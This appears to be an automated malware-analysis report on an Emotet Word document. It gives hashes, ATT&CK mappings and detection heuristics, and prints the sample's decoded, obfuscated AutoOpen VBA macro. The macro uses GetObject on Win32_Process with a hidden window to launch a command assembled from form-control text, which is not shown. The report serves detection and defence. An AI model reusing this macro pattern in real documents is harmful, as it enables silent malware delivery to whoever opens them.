Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 a6a7d60880d6e5ea…

MALICIOUS

Office (OLE)

124.6 KB Created: 2019-05-20 07:57:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 4318f25975f138deb42e5f58113b4c64 SHA-1: 93d4904e9391adaf07c2869d0ede04625126de96 SHA-256: a6a7d60880d6e5eaac0ee87edfca1f187cd002f7f3f3c37668f401d7f3ff33fa
342 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains an auto-executing VBA macro that is obfuscated and uses a custom decoder. This macro utilizes GetObject to call Win32_Process.Create, indicating an intent to launch a new process. This is a common technique used by Emotet to download and execute a second-stage payload. The ClamAV signature also confirms the Emotet family.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2695 bytes
SHA-256: 12c3b9c5098cf680ddfda0e6b657181f11d625daccd7874bbd36c66ed2cd18bd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "O3_4045"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "s250__65, 0, 0, MSForms, TextBox"
Attribute VB_Control = "R1136_, 1, 1, MSForms, TextBox"

Attribute VB_Name = "H94470"
Sub _
autoopen( _
)
   Dim d587624()
      ReDim d587624(5)
      d587624(0) = "206424235" + "276145942"
      d587624(1) = "270724748" + "644364997"
      d587624(2) = "998293622" + "775162821"
      d587624(3) = "419305928" + "165281006"
      d587624(4) = "645391534" + "663351253"
H719_241
   Dim a566_28()
      ReDim a566_28(5)
      a566_28(0) = "892355821" + "126824804"
      a566_28(1) = "12521960" + "228692477"
      a566_28(2) = "455213603" + "397088026"
      a566_28(3) = "94846704" + "5941859"
      a566_28(4) = "245411699" + "225236639"
End Sub
Sub H719_241()
   Dim X690083()
      ReDim X690083(5)
      X690083(0) = "935402011" + "7445275"
      X690083(1) = "1298829" + "594659946"
      X690083(2) = "479032764" + "9024263"
      X690083(3) = "815473014" + "252858305"
      X690083(4) = "180358411" + "452096720"
Set S19851 = GetObject(CStr("Winmgmts:Win32_ProcesSstartup"))
   Dim v47952()
      ReDim v47952(5)
      v47952(0) = "434953678" + "355235224"
      v47952(1) = "433715375" + "302757908"
      v47952(2) = "6807223" + "303678071"
      v47952(3) = "513990890" + "721825129"
      v47952(4) = "408871251" + "540064544"
S19851. _
ShowWindow = vbFalse - vbFalse
   Dim Q5954219()
      ReDim Q5954219(5)
      Q5954219(0) = "273197614" + "108278373"
      Q5954219(1) = "59680272" + "206794860"
      Q5954219(2) = "596328425" + "957730347"
      Q5954219(3) = "75404614" + "406869143"
      Q5954219(4) = "580567595" + "143116109"
Set A165533 = GetObject(CStr("Winmgmts:Win32_ProcesS"))
   Dim A658103()
      ReDim A658103(5)
      A658103(0) = "137479618" + "926490507"
      A658103(1) = "309241433" + "916751420"
      A658103(2) = "272206738" + "422731081"
      A658103(3) = "714085446" + "650175884"
      A658103(4) = "78890792" + "916197776"
A165533.Create J5438330 + "po" + a426725 + O3_4045.R1136_ + O3_4045.s250__65 + r55104, d10_94, S19851, N50607
   Dim r3891144()
      ReDim r3891144(5)
      r3891144(0) = "869990301" + "602729851"
      r3891144(1) = "6485658" + "501545638"
      r3891144(2) = "102647218" + "600955191"
      r3891144(3) = "842200192" + "762280068"
      r3891144(4) = "31891335" + "242008746"
End Sub


Attribute VB_Name = "W85356"

Open this report in the interactive analyzer, or submit your own file for analysis.